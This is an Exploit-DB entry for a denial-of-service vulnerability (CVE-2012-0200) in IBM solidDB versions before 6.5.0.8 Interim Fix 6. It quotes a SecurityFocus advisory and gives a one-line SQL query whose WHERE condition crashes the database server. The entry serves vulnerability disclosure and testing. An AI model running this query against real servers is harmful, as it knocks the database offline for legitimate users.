IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service Vulnerability

2012-02-09T00:00:00
ID EDB-ID:36869
Type exploitdb
Reporter IBM
Modified 2012-02-09T00:00:00

Description

IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service Vulnerability. CVE-2012-0200. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/52111/info

IBM solidDB is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

IBM solidDB versions prior to 6.5.0.8 Interim Fix 6 are vulnerable. 

SELECT * FROM a WHERE (b >0) AND (b IN (1,2))